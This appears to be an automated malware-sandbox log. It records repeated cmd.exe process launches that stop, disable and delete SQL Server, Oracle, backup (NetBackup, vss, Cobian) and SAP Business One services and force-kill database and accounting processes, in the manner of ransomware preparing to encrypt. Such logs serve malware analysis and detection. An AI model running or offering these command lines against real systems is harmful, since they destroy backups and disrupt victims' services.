        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
